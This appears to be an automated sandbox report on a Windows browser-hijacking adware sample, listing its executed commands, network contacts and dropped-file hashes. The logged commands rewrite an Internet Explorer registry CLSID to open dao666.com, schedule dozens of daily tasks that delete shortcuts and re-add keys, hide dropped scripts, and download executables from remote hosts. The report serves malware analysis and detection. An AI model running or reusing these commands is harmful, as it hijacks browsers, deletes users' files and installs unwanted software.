REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)" /v "MUIVerb" /t REG_SZ /d "@shdoclc.dll,-10241" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command" /ve /t REG_SZ /d "C:\progra~1\Intern~1\iexplore.exe http://www.dao666.com/?in" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command" /ve /t REG_SZ /d "C:\progra~1\Intern~1\iexplore.exe http://www.dao666.com/?in" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "Attributes" /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "HideFolderVerbs" /t REG_SZ /d "" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "HideOnDesktopPerUser" /t REG_SZ /d "" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "WantsParsDisplayName" /t REG_SZ /d "" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoInternetIcon" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C .\runonce.cmd
C:\Windows\SysWOW64\sc.exe
sc create Schedule binpath= "C:\Windows\svchost.exe -k netsvcs" depend= rpcss start= auto displayname= "Task Scheduler"
C:\Windows\SysWOW64\sc.exe
sc config Schedule start= auto
C:\Windows\SysWOW64\net.exe
net start "Task Scheduler"
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start "Task Scheduler"
C:\Windows\SysWOW64\at.exe
at 8:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 8:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 8:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 9:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 9:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 9:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 10:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 10:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 10:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 11:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 11:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 11:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 12:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 12:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 12:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 13:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 13:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 13:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 14:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 14:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 14:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 15:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 15:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 15:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 16:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 16:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 16:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 17:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 17:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 17:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 18:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 18:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 18:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\SysWOW64\at.exe
at 19:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 19:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 19:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 20:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 20:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 20:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 21:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 21:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 21:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 22:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 22:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 22:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 23:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 23:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 23:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 00:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
C:\Windows\SysWOW64\at.exe
at 00:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explore*.*"
C:\Windows\SysWOW64\at.exe
at 00:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 10:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"
C:\Windows\SysWOW64\at.exe
at 10:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»└└*.*"
C:\Windows\SysWOW64\at.exe
at 10:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdit\is.cmd
C:\Windows\SysWOW64\at.exe
at 10:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"
C:\Windows\SysWOW64\at.exe
at 14:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"
C:\Windows\SysWOW64\at.exe
at 14:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»*.*"
C:\Windows\SysWOW64\at.exe
at 14:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdit\is.cmd
C:\Windows\SysWOW64\at.exe
at 14:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"
C:\Windows\SysWOW64\at.exe
at 19:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"
C:\Windows\SysWOW64\at.exe
at 19:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»*.*"
C:\Windows\SysWOW64\at.exe
at 19:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdit\is.cmd
C:\Windows\SysWOW64\at.exe
at 19:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"
C:\Windows\SysWOW64\at.exe
at 21:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»*.*"
C:\Windows\SysWOW64\at.exe
at 21:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»*.*"
C:\Windows\SysWOW64\at.exe
at 21:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdit\is.cmd
C:\Windows\SysWOW64\at.exe
at 21:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»*.*"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C .\copy.cmd
C:\Windows\SysWOW64\attrib.exe
attrib +r +h +s "C:\Program Files\WinWare\361.cmd"
C:\Windows\SysWOW64\attrib.exe
attrib +r +h +s "C:\Program Files\WinWare\fav\fav.cmd"
C:\Windows\SysWOW64\attrib.exe
attrib +r +h +s "C:\Program Files\WinWare\tool.cmd"
C:\Windows\SysWOW64\attrib.exe
attrib +r +h +s "C:\Program Files\WinWare\360.cmd"
C:\Windows\SysWOW64\attrib.exe
attrib +r +h +s "C:\Program Files\Windows\360SE.vbs"
C:\Windows\SysWOW64\attrib.exe
attrib +r +h +s "C:\Program Files\Windows\36OSE.vbs"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C .\360.cmd
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C .\cpa.cmd
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msn.exe
".\msn.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Gaicia.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Gaicia.exe" "http://download.youbak.com/msn/software/partner/36a.exe"
C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Gaicia.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Gaicia.exe" "http://down.kuwo.cn/mbox/kwmusic_msnassistant.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dao666.com | udp |
| HK | 154.220.60.25:80 | dao666.com | tcp |
| HK | 154.220.60.25:80 | dao666.com | tcp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.60.220.154.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | download.youbak.com | udp |
| HK | 8.210.83.183:80 | download.youbak.com | tcp |
| US | 8.8.8.8:53 | 183.83.210.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | down.kuwo.cn | udp |
| CN | 116.136.15.215:80 | down.kuwo.cn | tcp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.19.199.152.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install_7xdown.vbs
| MD5 | 3f60b1c32c66c4fafe67b131c81b537e |
| SHA1 | abacf3653d89eff785c76bc9de685210da67409d |
| SHA256 | 306fc7e0980c7e21adf92b220204dfa36baf0f5d107f7de0a167a92f35818a94 |
| SHA512 | 20fcf8215876e448b4d1bfbe8a6ff167cfdb262183364138560b6d5740da0dbf7f0a723763bfc3743240b6fea6fa5f1fa4e25a14a5edb54271bbd7e97fff727a |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\tool.cmd
| MD5 | 4e8f8a4f4a836c587f77d3f294286692 |
| SHA1 | b6ae662e53f5d08f7cbc0c06a08d47930dbaf0cc |
| SHA256 | b0367e47ed6fee2d6843d240ac7e83b932466ddd13cc57d971d6cb8e8b2c55a5 |
| SHA512 | 25dfc1a3b4bd4b5c3263f64ae36127bc141138d922316b97bc96c5edd8b84a5b6193b7c687c89ad554d8abee68bc4aad52632a3d98e220352515e380cd749874 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Internet Exploror.lnk
| MD5 | b6090a24bad18a0205bb215cb1fd42e6 |
| SHA1 | da56e637a186333e1fa8401b9600e9efcadbe86b |
| SHA256 | 5cf73d8ba3a6656e804041884cefc0148c3ef80fd4b8633a6647a033082f15f8 |
| SHA512 | 4ca8a5cd200eaf8d8a023c47e7a279e41279c045bf567b81f95e93ca25d5a51dec2786de98efa5b907ec5633c8400e497f6bcaf636d4591d7c42e21ec3039ad4 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\winare.vbs
| MD5 | 4c63083996b714d331f877a7bb204216 |
| SHA1 | de8807c42284e99ba308ea8ad01cc3f4a8894b0a |
| SHA256 | 34666e9c92a0260d690f262a23e89a9b4ffa0c5c25178d0f2c1720f4b8d8b569 |
| SHA512 | f83b239bf307a4864d5f0fcb5c5052b0330ced35af767c48171ca5ec74949aa53219bfe226b9813f0408d979fa0774df89687da1ad36c49ee2ed12e40c842c1d |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\runonce.cmd
| MD5 | 2499bcde9656b2401e95fe6c6d4fe268 |
| SHA1 | dc7bf897affd9f8e4f870be5fa102009a02f22ed |
| SHA256 | 3e0c8d48799b9fb4c275a8332a009d6d0bb0a6315343b45aad43c20cfbd4e2b6 |
| SHA512 | fa3eb6078510a2b70309d279157c60a5ad60c970c35906224ca5a3c9d626ef7b2d2d97fe75a06855a137da80a339ba499e0e4bc8f7fbf88882390710b25289b9 |
\??\PIPE\atsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\copy.cmd
| MD5 | 20e8b5c5e8779c45d0cffeb223e1b4ee |
| SHA1 | e33e7c02fc54766be39b7844f31baae5d474c27e |
| SHA256 | 5412e0c39e7967064c825e6d487f41d356e423f2b60a272213b0909dae1e22b0 |
| SHA512 | 03c707911e6fe9bd190fe645b0743f7e65a8b0175aee8367a84203be9f213b2c4135a360aaeea63469e76d3dc31a9563a9dd2182f3b24c5489c7addd2d184673 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\is.cmd
| MD5 | 83b98633c669411050739335068d2755 |
| SHA1 | de25c70f8b5845375efd44ae5e4386380fe27ead |
| SHA256 | b057b6c505f2257015ca2efbb6ea86ffe0357ee7cae262191349a208ede27639 |
| SHA512 | 920421a1287091d699bee5480c67f906626f5ff8b4ef6629123a99828e7c6a78ddecc814320b9529f105ed60126df481ec8086173adf1b883d674e6ba3a9364f |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\360.cmd
| MD5 | 20c2b9872ca6f858414a9251ae37dede |
| SHA1 | 853438b13ee186dcc87d2196781e154289749a0f |
| SHA256 | e22076817c4391fcb6c373a2b5c89c79f814e30534316b4627661151a54aa2bf |
| SHA512 | 716a0ec68f92ef32ce74718e18b56c16095c0a35d29c47e63bdd1d8e8c44967541908cdf9d4ded7906c622c80773f63495c36743ec006a9dc53eed0f429b0192 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\361.cmd
| MD5 | 1e9b64c129e313ec49378f5b823b2ca6 |
| SHA1 | 21ecde39469900b9bd551f4a9576c5a9564d4d60 |
| SHA256 | 87334dcec453b142801040c3084219f840a531c94553f06ee817192c121207ee |
| SHA512 | 0178907df2fa444f463c4c9604bffa7007569daa61b1905dee1b850c9a50754b6bf90c70364ccfc65a609d2dee9f902eefc4b564afcc37fdb253cdfe0bfba840 |
C:\Program Files\Windows\360SE.vbs
| MD5 | 89ec051ab621ccd6ab684bb0f17a25ce |
| SHA1 | 1ef2b94c285bfb602892a6e42b1f4b5ba645315f |
| SHA256 | 0dcd0d2e9c602f4603d9f914a8e4764a6cd6c9c4e986d110b93d846c524110b3 |
| SHA512 | 2ce9c5a5497d68ca5357d6b7ef0239a0bdc8706428e99fe88b2dd3026fb7c734484d77cee088a625bdcadb7eb8e293d728a7525b28614859640806cabb24b001 |
C:\Program Files\Windows\36OSE.vbs
| MD5 | 327cff8c30e74afc5af67a19d82774e5 |
| SHA1 | 13e1be20402e16f7dbf0d86c00f626070f8c9d16 |
| SHA256 | bc3ca0ade216627a479f9e92eb08efb88b38384fb2cb75f14757600d9b27f6d9 |
| SHA512 | 0e7295ea48de989929313ceb0ac06afa490a188c756a5d71835fb04283f968c82bfeec72ea68e6fb2d957e4ab9d5bb49e95ee8ca9d5ad3c04d1abfbe0e18c6da |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Gaicia.exe
| MD5 | cab7920419ef7ed1e22e9fc4da013bd1 |
| SHA1 | 48fc6488e928b4fa5ee75ca74ed1548e316bd6db |
| SHA256 | e96c8d5cc0a23032da47280e8835161a959de6965b696328c8a0edf160c3f208 |
| SHA512 | 8393a0160a8e58169554528562e40cf3d4318320475d53377b24dbba42a83026e390a2bb272cdcb89e4d851aac0e75f9cbda65440258569662711f9d1eadc4f0 |
memory/1984-91-0x0000000000400000-0x00000000004D1000-memory.dmp
